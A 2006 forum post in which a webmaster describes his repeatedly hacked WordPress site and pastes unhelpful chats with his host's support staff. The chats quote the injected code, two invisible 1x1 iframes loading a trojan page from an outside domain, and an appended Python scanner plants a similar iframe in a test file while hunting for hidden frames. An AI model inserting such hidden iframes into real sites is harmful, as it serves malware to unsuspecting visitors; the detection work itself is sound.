Old 10-02-2006, 08:54 PM  
RobV
Confirmed User
 
Join Date: Oct 2005
Posts: 111
Response (part 2 of): I keep getting hacked...

This is in continuation from my original post:
http://www.gfy.com/fucking-around-and-business-discussion/660506-getting-hacked-2.html

I had to end up deleting everything from the server and reinstall, but again I was ONLY running WP.

So I decide to turn off my computers, shut everything down, and take a little trip: I went to my house in Arizona for the weekend, I come back and it is hacked again.

This time I have different code embedded at the top:


Here is the first conversation:
Monday, October 02, 2006 5:19:24 PM (10/2/2006 9:19:24 PM - GMT)

Powered by SightMax.

Welcome to Webair, Alex will be right with you.

Alex:
hello, how may i help you?

Rob:
yeah I need a lot of help.

Rob:
my website has been compromised and I was wondering if you could assist me in finding a solution?

Alex:
what site?

Rob:
www.howgay.com

Alex:
in what way was it compromised?

Alex:
is there a ticket # on this?

Rob:
no ticket number, every day or other day.....code is being inserted into the header portion. its a trojan.

Rob:
the code in there at the moment is

Rob:
:

Rob:
<iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>

Rob:
I was told ::

Rob:
Here's a little suggestion to see what is running in the background: I'm presuming this malicious script is being called by a cron job so log in by ssh with your root password and type in crontab -l See what is running in the background

Rob:
because i have a rootkit on the server?

Alex:
i'll check cron

Rob:
anything

Rob:
?

Alex:
sorry still working on it

Rob:
oh cool, I dont mean to bother you. sorry

Rob:
?

Alex:
almost done checking

Rob:
okay cool thanks again

Alex:
there is no crontabs for that user

Alex:
we suggest upgrading all the scripts to the latest version which is most probably the reason of compromises

Rob:
i only run wordpress

Rob:
its the most up to date one

Alex:
<iframe src='http://megacount.net/adv/066/new.php' width=1 height=1></iframe>
<iframe src='http://megacount.net/adv/new.php?adv=66' width=1 height=1></iframe>

Alex:
where is the code?

Rob:
on the very top

Rob:
of the index page

Alex:
a senior tech will be able to take a look at this issue in 5-10 minutes.

Alex:
please dont remove it

Alex:
keep the page as it is

Rob:
okay, how will i get an update?

Alex:
i will create a ticket on this on your behalf and you'll get an email

Rob:
okay

Rob:
cool

Rob:
so ill just sit tight

Rob:
have a good day

Visitor Rob has ended the chat

Then my second conversation after hours of no response:
Adrian
Hi, how may i help?
RobV
yeah adrian, i was talking to you earlier about my hacked website.
Adrian
the exploit is not on our side
RobV
and is there any record of when it was changed? or anything?
Adrian
one moment
Adrian
where on the site does it show its hacked
RobV
on the main page
RobV
there is embedded code
RobV
and when you visit the site
RobV
it tries to load a trojan
Adrian
i believe the problem lies in your computer at home
Adrian
it might have gotten to the server through an upload
Adrian
trojans don't spread on virtual unix systems
RobV
i had my computers off all weekend for this specific reason
Adrian
i'm on a unix machine and when i pull up the site thats all i see, the site
Adrian
get some good antivirus software, i recommend an updated Norton Antivirus and completely download all the content and scan your computer


And thats where I sit, NOTHING NEW, NOTHING SOLVED.
and yes - I already have the most up to date Norton software, everything has been scanned and double checked. BUT MORE IMPORTANTLY - my "infected computer at home" wasn't on or I have not accessed my server SINCE everything was "fixed". Also it only happens to this site folder, my other domains and other sites are not infected (and yes I have been working on them and uploading), weird?
__________________
ICQ: 619221
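A check for the kind of injection described in this post (an invisible 1x1 iframe at the top of a page), listing each hit with the file's modification time, which bears on the question of when the page was changed. This is an added example, not part of the original post or the chat logs; the function names, the extension list and the tracker.example sample tree are assumptions constructed for illustration.

```python
import os
import re
import tempfile
from datetime import datetime, timezone

WEB_EXTS = (".php", ".html", ".htm", ".js", ".tpl", ".inc")  # assumed list
IFRAME_RE = re.compile(rb"<iframe\b[^>]*>", re.I)
ATTR_RE = re.compile(
    rb"""\b(src|width|height|style)\s*=\s*(?:'([^']*)'|"([^"]*)"|([^\s>]+))""", re.I)
TINY_RE = re.compile(r"[01](px)?", re.I)

def iframe_attrs(tag):
    """Parse an <iframe> tag's src/width/height/style into a dict."""
    return {n.decode().lower(): (sq or dq or bare).decode("latin-1").strip()
            for n, sq, dq, bare in ATTR_RE.findall(tag)}

def is_hidden(a):
    """True when the frame is sized or styled so a visitor cannot see it."""
    tiny = all(TINY_RE.fullmatch(a.get(k, "")) for k in ("width", "height"))
    style = a.get("style", "").replace(" ", "").lower()
    return tiny or "display:none" in style or "visibility:hidden" in style

def find_hidden_iframes(root):
    """Walk root and list (path, line, src, mtime_utc) for each hidden iframe."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for fn in sorted(f for f in files if f.lower().endswith(WEB_EXTS)):
            path = os.path.join(dirpath, fn)
            with open(path, "rb") as fh:
                data = fh.read()
            mtime = datetime.fromtimestamp(os.path.getmtime(path), timezone.utc).isoformat()
            for m in IFRAME_RE.finditer(data):
                a = iframe_attrs(m.group(0))
                if is_hidden(a):
                    line = data.count(b"\n", 0, m.start()) + 1
                    hits.append((path, line, a.get("src", ""), mtime))
    return hits

def demo():
    """Constructed sample tree: one clean file, one with a 1x1 frame on line 1."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "about.html"), "w") as fh:
            fh.write("<iframe src='/map.html' width=600 height=400></iframe>\n")
        with open(os.path.join(root, "index.php"), "w") as fh:
            fh.write("<iframe src='http://tracker.example/new.php' width=1 height=1></iframe>\n<?php get_header(); ?>\n")
        return [(os.path.basename(p), ln, src) for p, ln, src, _ in find_hidden_iframes(root)]

if __name__ == "__main__":
    print(demo())
```

A file's mtime can be reset by anyone with write access to it, so treat the timestamp as a hint and correlate it with the FTP, SSH and web server logs for the same window.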